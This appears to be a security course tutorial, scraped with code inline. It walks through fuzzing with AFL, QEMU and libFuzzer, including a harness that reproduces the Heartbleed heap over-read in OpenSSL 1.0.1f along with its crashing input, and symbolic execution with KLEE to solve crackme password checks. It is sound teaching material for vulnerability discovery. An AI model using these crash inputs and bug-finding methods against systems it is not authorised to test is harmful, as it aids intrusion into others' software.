$ cat output/crashes/id:000001,sig:06,src:000001,op:flip2,pos:18 | ./registration ... [*] Unregister course :( - Give me an index to choose double free or corruption (fasttop) Abort (core dumped) ./registration # need to run docker with # --cap-add=SYS_PTRACE --security-opt seccomp=unconfined $ gdb registration (gdb) run < output/crashes/id:000000,sig:06,src:000000... ... Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 (gdb) bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff7a24801 in __GI_abort () at abort.c:79 #2 0x00007ffff7a6d897 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7b9ab9a "%s\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff7a7490a in malloc_printerr (str=str@entry=0x7ffff7b9c828 "double free or corruption (fasttop)") at malloc.c:5350 #4 0x00007ffff7a7c004 in _int_free (have_lock=0, p=0x55555575a250, av=0x7ffff7dcfc40 <main_arena>) at malloc.c:4230 #5 __GI___libc_free (mem=0x55555575a260) at malloc.c:3124 #6 0x0000555555556d1d in unregister_course () at registration.c:110 #7 0x0000555555554de7 in main () at registration.c:173 (Have you spotted the exploitable security bug?!)
You can enable ASAN simply by setting AFL_USE_ASAN=1:
ASAN
AFL_USE_ASAN=1
$ make clean $ AFL_USE_ASAN=1 CC=afl-clang make $ ./registration < output/crashes/id:000000,sig:06,src:000000... ... ================================================================= ==20957==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000020 at pc 0x562a7aadc3f9 bp 0x7ffee576f8f0 sp 0x7ffee576f8e8 READ of size 8 at 0x603000000020 thread T0 #0 0x562a7aadc3f8 in register_course tut1/registration.c:63:21 #1 0x562a7aade3d8 in main tut1/registration.c:170:17 #2 0x7f1c00605222 in __libc_start_main (/usr/lib/libc.so.6+0x24222) #3 0x562a7a9cb0ed in _start (tut1/registration+0x1f0ed) 0x603000000020 is located 16 bytes inside of 32-byte region [0x603000000010,0x603000000030) freed by thread T0 here: #0 0x562a7aa9de61 in __interceptor_free (tut1/registration+0xf1e61) #1 0x562a7aadcf28 in unregister_course tut1/registration.c:111:5 #2 0x562a7aade3e2 in main tut1/registration.c:173:17 #3 0x7f1c00605222 in __libc_start_main (/usr/lib/libc.so.6+0x24222) previously allocated by thread T0 here: #0 0x562a7aa9e249 in malloc (tut1/registration+0xf2249) #1 0x562a7aadc0c5 in new_student tut1/registration.c:16:31 #2 0x562a7aadc0c5 in register_course tut1/registration.c:56 #3 0x562a7aade3d8 in main tut1/registration.c:170:17 #4 0x7f1c00605222 in __libc_start_main (/usr/lib/libc.so.6+0x24222) SUMMARY: AddressSanitizer: heap-use-after-free tut1/registration.c:63:21 in register_course Shadow bytes around the buggy address: 0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c067fff8000: fa fa fd fd[fd]fd fa fa 00 00 00 00 fa fa fa fa 0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==20957==ABORTING
With ASAN, the program might stop at a different location, i.e., register_course(), unlike the previous case as it aborts when free()-ing in unregister_course(). ASAN really helps in pinpointing the root cause of the security problem!
register_course()
unregister_course()
// ex2.cc int strncmp(const char *s1, const char *s2, size_t n) { size_t i; int diff; * for (i = 0; i < n; i++) { * diff = ((unsigned char *) s1)[i] - ((unsigned char *) s2)[i]; * if (diff != 0 || s1[i] == '\0') * return diff; } return 0; }
$ afl-gcc ex2.cc $ afl-fuzz -i input -o output ./a.out ...
At this time, AFL quickly reports more than one unique crashes, although all of them are essentially the same. This is mainly because AFL considers an input unique if it results in a different coverage map, while each iteration of the for loop (*) in strncmp() is likely considered as an unique path.
strncmp()
// ex3.cc int main(int argc, char *argv[]) { char data[100] = {0}; size_t size = read(0, data, 100); if (size > 3 && *(unsigned int *)data == 0xdeadbeef) __builtin_trap(); return 0; }
$ afl-gcc ex3.cc $ afl-fuzz -i input -o output ./a.out ...
Even after a few minutes, it's unlikely that AFL can randomly mutate inputs to become 0xdeadbeef for triggering crashes. Nevertheless, it indicates the importance of the seeding inputs: try to provide those that can cover as many branches as possible so that the fuzzer can focus on discovering crashing inputs.
Now we are going to fuzz binary programs. In most cases as attackers, we cannot assume the availability of source code to find vulnerabilities. To provide such transparency, we are going to use a system-wide emulator, called QEMU, to combine with AFL for fuzzing binaries.
QEMU
AFL
$ cd tut10-01-fuzzing $ ./build.sh
$ cd tut2 $ ls -l input -rw-rw-r-- 1 root root 15631 Oct 25 01:35 sample.gif
Since the fuzzed binary gif2png transforms a gif file into a png file, we can find legitimate gif images online and feed them to fuzzer as seeding inputs.
gif2png
gif
png
$ ../afl-2.52b/afl-fuzz -Q -i input -o output -- ./gif2png
$ gdb gif2png (gdb) run < output/crashes/id:000000,sig:06,src:000000...
[Task] Can you find any bugs in the binary?
ABC is a text-based music notation system designed to be comprehensible by both people and computers. Music notated in abc is written using letter, digits and punctuation marks.
Let's generate a Christmas Carol! Save the below text as music.abc:
music.abc
X:23001 T:We Wish You A Merry Christmas R:Waltz C:Trad. O:England, Sussex Z:Paul Hardy's Xmas Tunebook 2012 (see www.paulhardy.net). Creative Commons cc by-nc-sa licenced. M:3/4 L:1/8 Q:1/4=180 K:G D2|"G" G2 GAGF|"C" E2 C2 E2|"A" A2 ABAG|"D" F2 D2 D2| "B" B2 BcBA|"Em" G2 E2 DD|"C" E2 A2 "D" F2|"G" G4 D2|| "G" G2 G2 G2|"D" F4 F2|"A" G2 F2 E2|"D" D4 A2| "B" B2 AA G2|"D" d2 D2 DD|"C" E2 A2 "D" F2|"G" G6|] W:We wish you a merry Christmas, we wish you a merry Christmas, W:We wish you a merry Christmas and a happy New Year! W:Glad tidings we bring, to you and your kin, W:We wish you a merry Christmas and a happy New Year!
Run the target binary with the saved text, and check the content of the generated file.
$ cd tut3 $ ./abcm2ps.bin music.abc $ ls -l Out.ps -rw-r--r-- 1 root root 21494 Oct 25 01:47 Out.ps
$ mkdir input $ mv music.abc input $ ../afl-2.52b/afl-fuzz -Q -i input -o output -- ./abcm2ps.bin - (NOTE. '-' is important, as it makes binary read input from stdin)
Now we will learn about libFuzzer that is yet another coverage-based, evolutionary fuzzer. Unlike AFL, however, libFuzzer runs "in-process" (i.e., don't fork). Thus, it can easily outperform in regard to the cost of testing (i.e., # exec/sec) compared to AFL.
libFuzzer
It has one fundamental caveat: the testing function, or the way you test, should be side-effect free, meaning no changes of global states. It's really up to the developers who run libFuzzer.
Let's first instrument the code. At this time, it does not require a special wrapper unlike afl-gcc/afl-clang, as the latest clang is already well integrated with libFuzzer.
afl-gcc/afl-clang
clang
$ cd tut4 $ clang -fsanitize=fuzzer ex1.cc $ ./a.out ...
// ex1.cc extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { if (size > 0 && data[0] == 'H') if (size > 1 && data[1] == 'I') if (size > 2 && data[2] == '!') __builtin_trap(); return 0; }
ex1.cc is essentially the same code you saw in the previous step, but it is tweaked a bit to support libFuzzer. In fact, it is designed to be linked with libFuzzer.a (i.e., the starting main() in the /usr/lib/llvm-6.0/lib/libFuzzer.a). The fuzzing always starts by invoking LLVMFuzzerTestOneInput() with two arguments, data (i.e., mutated input) and its size. For each fuzzing run, libfuzzer follows these steps (similar to AFL):
ex1.cc
libFuzzer.a
/usr/lib/llvm-6.0/lib/libFuzzer.a
If the compiled program crashes (e.g., raising SEGFAULT) in the middle the cycle, it stops, reports and reproduces the tested input for further investigation.
SEGFAULT
Let's understand the output of the fuzzer execution:
$ ./a.out INFO: Seed: 1669786791 INFO: Loaded 1 modules (8 inline 8-bit counters): 8 [0x67d020, 0x67d028), INFO: Loaded 1 PC tables (8 PCs): 8 [0x46c630,0x46c6b0), INFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes INFO: A corpus is not provided, starting from an empty corpus #2 INITED cov: 2 ft: 2 corp: 1/1b exec/s: 0 rss: 32Mb #402 NEW cov: 3 ft: 3 corp: 2/5b exec/s: 0 rss: 32Mb L: 4/4 MS: 5 ChangeByte-ChangeByte-ChangeByte-CMP-EraseBytes- DE: "H\x00\x00\x00"- #415 REDUCE cov: 3 ft: 3 corp: 2/4b exec/s: 0 rss: 32Mb L: 3/3 MS: 3 ChangeBit-ChangeByte-EraseBytes- #426 REDUCE cov: 3 ft: 3 corp: 2/3b exec/s: 0 rss: 32Mb L: 2/2 MS: 1 EraseBytes- #437 REDUCE cov: 4 ft: 4 corp: 3/4b exec/s: 0 rss: 32Mb L: 1/2 MS: 1 EraseBytes- #9460 NEW cov: 5 ft: 5 corp: 4/6b exec/s: 0 rss: 32Mb L: 2/2 MS: 3 CMP-EraseBytes-ChangeBit- DE: "H\x00"- #9463 NEW cov: 6 ft: 6 corp: 5/9b exec/s: 0 rss: 32Mb L: 3/3 MS: 3 CopyPart-CopyPart-EraseBytes- ==26007== ERROR: libFuzzer: deadly signal #0 0x460933 in __sanitizer_print_stack_trace (/tut/tut10-01-fuzzing/tut4/a.out+0x460933) #1 0x4177d6 in fuzzer::Fuzzer::CrashCallback() (/tut/tut10-01-fuzzing/tut4/a.out+0x4177d6) #2 0x41782f in fuzzer::Fuzzer::StaticCrashSignalCallback() (/tut/tut10-01-fuzzing/tut4/a.out+0x41782f) #3 0x7f72da89788f (/lib/x86_64-linux-gnu/libpthread.so.0+0x1288f) #4 0x460d12 in LLVMFuzzerTestOneInput (/tut/tut10-01-fuzzing/tut4/a.out+0x460d12) #5 0x417f17 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/tut/tut10-01-fuzzing/tut4/a.out+0x417f17) #6 0x422784 in fuzzer::Fuzzer::MutateAndTestOne() (/tut/tut10-01-fuzzing/tut4/a.out+0x422784) #7 0x423def in fuzzer::Fuzzer::Loop(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, fuzzer::fuzzer_allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > > const&) (/tut/tut10-01-fuzzing/tut4/a.out+0x423def) #8 0x4131ac in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/tut/tut10-01-fuzzing/tut4/a.out+0x4131ac) #9 0x406092 in main (/tut/tut10-01-fuzzing/tut4/a.out+0x406092) #10 0x7f72d9af3b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #11 0x4060e9 in _start (/tut/tut10-01-fuzzing/tut4/a.out+0x4060e9) NOTE: libFuzzer has rudimentary signal handlers. Combine libFuzzer with AddressSanitizer or similar for better crash reports. SUMMARY: libFuzzer: deadly signal MS: 2 InsertByte-ChangeByte-; base unit: 7b8e94a3093762ac25eef0712450555132537f26 0x48,0x49,0x21,0x49, HI!I artifact_prefix='./'; Test unit written to ./crash-df43a18548c7a17b14b308e6c9c401193fb6d4a9 Base64: SEkhSQ==
INFO: Seed: 107951530
Have you tried invoking ./a.out multiple times? Have you noticed that its output changes in every invocation? It shows that the randomness aspect of libFuzzer. If you want to deterministically reproduce the result, you can provide the seed via the "-seed" argument like:
$ ./a.out -seed=107951530
INFO: Loaded 1 modules (8 inline 8-bit counters): 8 [0x55f89f7cac20, 0x55f89f7cac28), INFO: Loaded 1 PC tables (8 PCs): 8 [0x55f89f7cac28,0x55f89f7caca8),`
It shows that # PCs are instrumented (8 PCs) and keeps track of 8-bit (i.e., 255 times) per instrumented branch or edge.
INFO: -max_len is not provided; libFuzzer will not generate inputs larger than 4096 bytes INFO: A corpus is not provided, starting from an empty corpus
-max_len limits the testing input size (upto 4KB by default) and it runs without any corpus. If you'd like to add initial inputs, just create a corpus directory and provide it via another argument, similar to AFL.
-max_len
$ mkdir corpus $ echo AAAA > corpus/seed1 $ ./a.out corpus ...
+---> #execution | +---> status ---+ --+ #426 NEW cov: 6 ft: 6 corp: 5/9b lim: 4 exec/s: 0 rss: 23Mb L: 2/3 MS: 1 EraseBytes- -----+ ----+ ---------+ -----+ --------+ --------+ -----+ +--------------- | | | | | | | +---> mutation strategies (see more) | | | | | | +---> input size / max size | | | | | +---> memory usage | | | | +---> exec/s (but this run exits too fast) | | | +---> #size limit in this phase, increasing upto -max_len | | +---> #corpus in memory (6 inputs), its total size (9 bytes) | +---> #features (e.g., #edge, counters, etc) +---> coverage of #code block
The mutation strategies are the most interesting field:
+---> N mutations | MS: 1 EraseBytes- MS: 2 ShuffleBytes-CMP- DE: "I\x00"- | +----------------> mutation strategies
There are ~15 different mutation strategies implemented in libFuzzer. Let's take a look on one of them:
size_t MutationDispatcher::Mutate_ShuffleBytes(uint8_t *Data, size_t Size, size_t MaxSize) { if (Size > MaxSize || Size == 0) return 0; size_t ShuffleAmount = Rand(std::min(Size, (size_t)8)) + 1; // [1,8] and <= Size. size_t ShuffleStart = Rand(Size - ShuffleAmount); assert(ShuffleStart + ShuffleAmount <= Size); std::shuffle(Data + ShuffleStart, Data + ShuffleStart + ShuffleAmount, Rand); return Size; }
As the name applies, ShuffleBytes goes over #ShuffleAmount and randomly shuffles each bytes ranged from ShuffleStart.
ShuffleBytes
#ShuffleAmount
ShuffleStart
Note that the status line is reported whenever the new coverage is found (see "cov:" increasing on every status line).
"cov:"
==26007== ERROR: libFuzzer: deadly signal #0 0x460933 in __sanitizer_print_stack_trace (/tut/tut10-01-fuzzing/tut4/a.out+0x460933) #1 0x4177d6 in fuzzer::Fuzzer::CrashCallback() (/tut/tut10-01-fuzzing/tut4/a.out+0x4177d6) #2 0x41782f in fuzzer::Fuzzer::StaticCrashSignalCallback() (/tut/tut10-01-fuzzing/tut4/a.out+0x41782f) #3 0x7f72da89788f (/lib/x86_64-linux-gnu/libpthread.so.0+0x1288f) #4 0x460d12 in LLVMFuzzerTestOneInput (/tut/tut10-01-fuzzing/tut4/a.out+0x460d12) ... SUMMARY: libFuzzer: deadly signal MS: 2 InsertByte-ChangeByte-; base unit: 7b8e94a3093762ac25eef0712450555132537f26 0x48,0x49,0x21,0x49, HI!I artifact_prefix='./'; Test unit written to ./crash-df43a18548c7a17b14b308e6c9c401193fb6d4a9 Base64: SEkhSQ==
Whenever the fuzzer catches a signal (e.g., SEGFAULT), it stops and reports the crashing status like above---in this case, the fuzzer hits __builtin_trap(). It also persistently stores the crashing input as a file as a result (i.e., crash-df43a18548c7a17b14b308e6c9c401193fb6d4a9)
crash-df43a18548c7a17b14b308e6c9c401193fb6d4a9
The crashing input can be individually tested by passing it to the instrumented binary.
$ ./a.out ./crash-df43a18548c7a17b14b308e6c9c401193fb6d4a9 ...
Let's explore a few interesting design decisions made by libFuzzer:
More realistically, you can check if libFuzzer can find an input for strncmp(). In fact, this example indicates that having "edge" coverage really helps in finding bugs compared with a simple code coverage.
$ clang -fsanitize=fuzzer ex2.cc $ ./a.out ...
// ex2.cc int strncmp(const char *s1, const char *s2, size_t n) { size_t i; int diff; for (i = 0; i < n; i++) { diff = ((unsigned char *) s1)[i] - ((unsigned char *) s2)[i]; * if (diff != 0 || s1[i] == '\0') return diff; } return 0; }
The limitation of "bruteforcing" is to find an exact input condition concretely specified in the conditional branch, like below.
// ex3.cc extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { if (size > 3 && *(unsigned int *)data == 0xdeadbeef) __builtin_trap(); return 0; }
What's the chance of "randomly" picking 0xdeadbeef?
$ clang -fsanitize=fuzzer ex3.cc $ ./a.out ...
You might find that libFuzzer finds the exact input surprisingly quickly! In fact, during instrumentation, libFuzzer identifies such simple comparison and takes them into consideration when mutating the input corpus.
$ objdump -M intel-mnemonic -d a.out ... 0000000000065ba0 <LLVMFuzzerTestOneInput>: 460b90: 55 push rbp 460b91: 48 89 e5 mov rbp,rsp ... *460beb: bf ef be ad de mov edi,0xdeadbeef *460bf0: 48 8b 45 f8 mov rax,QWORD PTR [rbp-0x8] *460bf4: 8b 08 mov ecx,DWORD PTR [rax] *460bf6: 89 ce mov esi,ecx *460bf8: 89 4d e4 mov DWORD PTR [rbp-0x1c],ecx *460bfb: e8 50 6e fd ff call 437a50 <__sanitizer_cov_trace_const_cmp4> 460c00: 8b 4d e4 mov ecx,DWORD PTR [rbp-0x1c] 460c03: 81 f9 ef be ad de cmp ecx,0xdeadbeef 460c09: 0f 84 15 00 00 00 je 460c24 <LLVMFuzzerTestOneInput+0x94> ...
You can see one helper function, __sanitizer_cov_trace_const_cmp4(), keeps track of the constant, 0xdeadbeef, associated with the cmp instruction.
__sanitizer_cov_trace_const_cmp4()
These are just tip of the iceberg. There are non-trivial amount of heuristics implemented in libFuzzer, making it possible to discover new bugs in programs.
Let's try to use libFuzzer in finding the Heartbleed bug in OpenSSL!
OpenSSL
// https://github.com/google/fuzzer-test-suite // handshake-fuzz.cc extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { static int unused = Init(); SSL *server = SSL_new(sctx); BIO *sinbio = BIO_new(BIO_s_mem()); BIO *soutbio = BIO_new(BIO_s_mem()); SSL_set_bio(server, sinbio, soutbio); SSL_set_accept_state(server); BIO_write(sinbio, Data, Size); SSL_do_handshake(server); SSL_free(server); return 0; }
To correctly test SSL_do_handshake(), we first have to prepare proper environments for OpenSSL (e.g., SSL_new), and set up the compatible interfaces (e.g., BIOs above) that deliver the mutated input to SSL_do_handshake().
SSL_do_handshake()
SSL_new
The instrumentation process is pretty trivial:
$ cat build.sh ... clang++ -g handshake-fuzz.cc -fsanitize=address -Iopenssl-1.0.1f/include \ openssl-1.0.1f/libssl.a openssl-1.0.1f/libcrypto.a \ /usr/lib/llvm-6.0/lib/libFuzzer.a $ ./build.sh
To run the fuzzer:
$ ./a.out ... ==28911==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x629000009748 at pc 0x0000004dc0a2 bp 0x7ffe1158dc10 sp 0x7ffe1158d3c0 READ of size 65535 at 0x629000009748 thread T0 #0 0x4dc0a1 in __asan_memcpy (/tut/tut10-01-fuzzing/tut4/a.out+0x4dc0a1) #1 0x525d4e in tls1_process_heartbeat /tut/tut10-01-fuzzing/tut4/openssl-1.0.1f/ssl/t1_lib.c:2586:3 #2 0x58f263 in ssl3_read_bytes /tut/tut10-01-fuzzing/tut4/openssl-1.0.1f/ssl/s3_pkt.c:1092:4 #3 0x59380a in ssl3_get_message /tut/tut10-01-fuzzing/tut4/openssl-1.0.1f/ssl/s3_both.c:457:7 #4 0x56103c in ssl3_get_client_hello /tut/tut10-01-fuzzing/tut4/openssl-1.0.1f/ssl/s3_srvr.c:941:4 ... 0x629000009748 is located 0 bytes to the right of 17736-byte region [0x629000005200,0x629000009748) allocated by thread T0 here: #0 0x4dd1e0 in __interceptor_malloc (/tut/tut10-01-fuzzing/tut4/a.out+0x4dd1e0) #1 0x5c1a92 in CRYPTO_malloc /tut/tut10-01-fuzzing/tut4/openssl-1.0.1f/crypto/mem.c:308:8 SUMMARY: AddressSanitizer: heap-buffer-overflow (/tut/tut10-01-fuzzing/tut4/a.out+0x4dc0a1) in __asan_memcpy Shadow bytes around the buggy address: 0x0c527fff9290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff92a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff92b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff92c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff92d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c527fff92e0: 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa 0x0c527fff92f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9310: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9320: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff9330: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==28911==ABORTING MS: 1 PersAutoDict- DE: "\xff\xff\xff\xff"-; base unit: 96438ff618abab3b00a2e08ae5faa5414f28ec3e 0x18,0x3,0x2,0x0,0x1,0x1,0xff,0xff,0xff,0xff,0x0,0x14,0x3,0x82,0x0,0x28,0x1,0x1,0x8a, \x18\x03\x02\x00\x01\x01\xff\xff\xff\xff\x00\x14\x03\x82\x00(\x01\x01\x8a artifact_prefix='./'; Test unit written to ./crash-707d154a59b6e039af702abfa00867937bc3ee16 Base64: GAMCAAEB/////wAUA4IAKAEBig==
You can easily debug the crash by attaching gdb to ./a.out with the crashing input:
$ gdb ./a.out --args > br tls1_process_heartbeat > run ./crash-707d154a59b6e039af702abfa00867937bc3ee16 ...
[Task] Could you trace down to memcpy(to, from, nbytes) and map the crashing input to its arguments?
memcpy(to, from, nbytes)
Hope you now understand the potential of using fuzzers, and apply to what you are developing!
In this tutorial, you will learn about symbolic execution, which is one of the most widely-used means for program analysis, and do some exercise with well-known symbolic execution engines, namely, KLEE and Angr.
Generally, a program is "concretely" executed; it handles concrete values, e.g., an input value given by a user, and its behavior depends on this input.
Let's revisit crackme0x00 we encountered in lab01:
int main(int argc, char *argv[]) { int passwd; printf("IOLI Crackme Level 0x00\n"); printf("Password: "); scanf("%d", &passwd); if (passwd == 3214) printf("Password OK :)\n"); else printf("Invalid Password!\n"); return 0; }
When user gives an integer 3214 as input, it is stored in variable passwd. Then, the execution will follow the first if branch to print out "Password OK :)". Otherwise, it will take the other (i.e., else) branch, and print out "Invalid Password!". Then program was executed concretely, and the paths taken were determeined by the concrete value of passwd.
3214
passwd
else
However, when we "symbolically" execute a program, a symbolic executor tracks symbolic states rather than concrete input by analyzing the program, and generates a set of test cases that can reach (theoretically) all paths existing in the program.
For example, if the same example is symbolically executed, the result would be two test cases: (1) passwd = 3214, that takes one branch, (2) passwd = 0, that takes the other branch.
passwd = 3214
passwd = 0
Why do we do this? This technique comes in handy when we are trying to test a program for bug, because it helps us find which input, namely a test case, triggers which part (i.e., path) of the tested program by tracking symbolic expression and path constraints. Don't get lost! Here's an example.
1 | void buggy(int x, int y) { 2 | int i = 10; 3 | int z = y * 2; 4 | if (z == x) { 5 | if (x >= y + 10) { 6 | z = z / (i - 10); /* Div-by-zero bug here */ 7 | } 8 | } 9 | }
Have you spotted the division-by-zero bug in line 6? When x is 100 and y is 50, z becomes 100 in line 3. Thus, the first if branch is taken, and as x (100) >= y + 10 (60), the program reaches line 6. Here, z / (i - 10) triggers a division-by-zero bug, because i is 10.
x
y
z
z / (i - 10)
i
As a program tester (or a bug hunter), you want to automatically find the pair of x and y that triggers the bug. Symbolic execution is a perfect match for this job.
Once we mark x and y as symbolic variables, two mappings are put in a symbolic store S: {x->x0, y->y0}, where a var->sym mapping indicates that "a variable var is represented by a symbolic expression sym." (Symbolic expressions are placeholders for unknown values.) Likewise, for z = y * 2, variable z is symbolically represented as z->2*y0, and this mapping is added to S. In addition, before encountering a branch, path constraint PC is true.
S: {x->x0, y->y0}
var->sym
var
sym
z = y * 2
z->2*y0
PC
true
S: {x->x0, y->y0, z->2*y0}, PC: true
S: {x->x0, y->y0, z->2*y0}
PC: true
Program execution diverges at the first branch, if (z == x):
if (z == x)
PC: (x0 != 2*y0)
PC: (x0 == 2*y0)
Path p1 directly reaches line 8, and has nothing left to do.
(path1) S: {x->x0, y->y0, z->2*y0}, PC: (x0 != 2*y0)
Path p2 then encounters another branch condition if (x >= y + 10), which renders two paths again:
if (x >= y + 10)
PC: (x0 != 2*y0) AND (x0 < y0+10)
PC: (x0 != 2*y0) AND (x0 >= y0+10)
Path p2-1 is done.
(path2-1) S: {x->x0, y->y0, z->2*y0}, PC: (x0 != 2*y0) AND (x0 < y0+10)
Now, the only remaining path is path2-2. The executor proceeds to line 6, where z in the symbolic store S is updated:
(path2-2) S: {x->x0, y->y0, z->2*y0/0}, PC: (x0 != 2*y0) AND (x0 >= y0+10)
S: {x->x0, y->y0, z->2*y0/0}
We ended up with three paths, with three sets of symbolic states that trigger each path: path1, path2-1, and path2-2. Now, a constraint solver jumps in to solve each path constraints and find concrete values that satisfy the constraint.
For example, Z3 constraint solver solves each path constraint to have
We now have three automatically generated test cases, with which we can explore each and every execution path of the program. Providing the x and y of the third test case, the division by zero bug will be triggered.
So, how is symbolic execution done in practice? KLEE is a powerful symbolic execution engine built on top of LLVM compiler infrastructure, targeting C code.
Let's open crackme0x00.c and check its contents. This program prints out "Password OK :)" when 3214 is provided as an input.
cd /tut/tut10-02-symexec/tut1-klee vim crackme0x00.c
Originally, this program read user input through scanf("%d", &passwd);. For symbolic execution, we comment this line out, and make KLEE handle variable passwd symbolically, by explicitly marking passwd as a symbolic variable:
scanf("%d", &passwd);
// scanf("%d", &passwd); klee_make_symbolic(&passwd, sizeof(passwd), "passwd");
You need to specify symbolic variables like above, in order for KLEE to consider them as symbolic variables, and keep track of their states during a symbolic execution.
KLEE operates on LLVM bitcode. With the symbolic variables annotated, we first need to compile our program to an LLVM bitcode:
$ clang-6.0 -I ./include -c -emit-llvm -g -O0 crackme0x00.c
crackme0x00.bc is the resulting bitcode, and we are ready to run KLEE on it.
crackme0x00.bc
KLEE is already installed on the server. You can start running an analysis by $ klee (options) [bitcode_file]:
$ klee (options) [bitcode_file]
$ klee crackme0x00.bc KLEE: output directory is "klee-out-0" KLEE: Using Z3 solver backend KLEE: WARNING: undefined reference to function: printf KLEE: WARNING ONCE: calling external: printf(93914628656128) at crackme0x00.c:12 3 IOLI Crackme Level 0x00 Password: Invalid Password! Password OK :) KLEE: done: total instructions = 23 KLEE: done: completed paths = 2 KLEE: done: generated tests = 2
We've just symbolically executed our program, and KLEE reported that it could reach two paths through symbolic execution, and generate test case for each path:
KLEE: done: completed paths = 2 KLEE: done: generated tests = 2
The generated test cases and metadata is stored under the output directory. If you ran KLEE multiple times, the directory's name could be different, but the latest result can always be referenced by klee-last, which symbolically links to the latest output directory:
KLEE: output directory is "klee-out-0"
Now, let's check the actual test cases generated by KLEE, and try to reproduce each case against the binary.
$ ls klee-last | grep ktest test000001.ktest test000002.ktest
A ktest file is a serialized object of a generated test case. It can be analyzed through ktest-tool utility that comes with KLEE. Let's examine how the first test case looks like:
ktest-tool
$ ktest-tool klee-last/test000001.ktest ktest file : 'klee-last/test000001.ktest' args : ['crackme0x00.bc'] num objects: 1 object 0: name: 'passwd' object 0: size: 4 object 0: data: b'\x8e\x0c\x00\x00' object 0: hex : 0x8e0c0000 object 0: int : 3214 object 0: uint: 3214 object 0: text: ....
We can find that passwd is 3214:
object 0: name: 'passwd' object 0: int : 3214
If we run the program with this concrete value, it will print "Password OK :)" as expected. We can compile the program and verify this by replaying the generated test case:
$ gcc -I ./include crackme0x00.c -lkleeRuntest -o crackme0x00 $ KTEST_FILE=klee-last/test000001.ktest ./crackme0x00 IOLI Crackme Level 0x00 Password: Password OK :)
As expected, the first test case printed "Password OK :)".
Now, let's investigate the second test case:
ktest file : 'klee-last/test000002.ktest' args : ['crackme0x00.bc'] num objects: 1 object 0: name: 'passwd' object 0: size: 4 object 0: data: b'\x00\x00\x00\x00' object 0: hex : 0x00000000 object 0: int : 0 object 0: uint: 0 object 0: text: ....
In this test case, passwd is 0. This test case will take the else branch, and print "Invalid Password!":
$ KTEST_FILE=klee-last/test000002.ktest ./crackme0x00 IOLI Crackme Level 0x00 Password: Invalid Password!
As shown, KLEE symbolically executed crackme0x00 by tracking the symbolic states of variable passwd, and found all (i.e., two) possible execution paths in the program.
Well, this is the basic workflow of KLEE. In the following section, we will utilize KLEE to crack other crackme challenges.
In crackme0x01, our objective is to find an input that would make the binary print "Password OK :)". The steps are not different from what we did for crackme0x00.
crackme0x01
First, remember to include klee header:
#include "klee/klee.h"
And then, mark the buffer to store our input symbolic:
klee_make_symbolic(&buf, sizeof(buf), "buf"); // scanf("%s", buf);
Now, compile and symbolically execute the program using KLEE:
$ clang-6.0 -I include -c -g -emit-llvm -O0 crackme0x01.c $ klee --libc-uclibc crackme0x01.bc
Do you see that it indeed printed "Password OK :)" at the end?
